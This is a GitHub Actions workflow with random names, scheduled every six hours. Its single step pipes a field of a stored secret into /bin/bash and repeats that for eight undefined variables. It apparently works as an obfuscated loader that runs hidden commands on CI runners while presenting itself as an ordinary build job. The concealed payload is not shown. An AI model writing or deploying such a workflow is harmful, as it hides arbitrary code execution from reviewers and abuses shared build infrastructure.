name: beenlemur
on:
  workflow_dispatch:
  schedule:
    - cron: '29 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: beenlemur
        env:
          zw77853: ${{ secrets.zw77853 }}
        run: |
          echo $zw77853 | jq -r .epxpt1 | /bin/bash
          echo $om26 | jq -r .il20 | /bin/bash
          echo $q8 | jq -r .ruw970 | /bin/bash
          echo $ch9010 | jq -r .o133 | /bin/bash
          echo $dh206 | jq -r .szwp9018 | /bin/bash
          echo $woe415 | jq -r .fdgb819 | /bin/bash
          echo $jfp4 | jq -r .yls9 | /bin/bash
          echo $gkv02 | jq -r .sxhb22130 | /bin/bash
          echo $lzt41 | jq -r .tj20 | /bin/bash

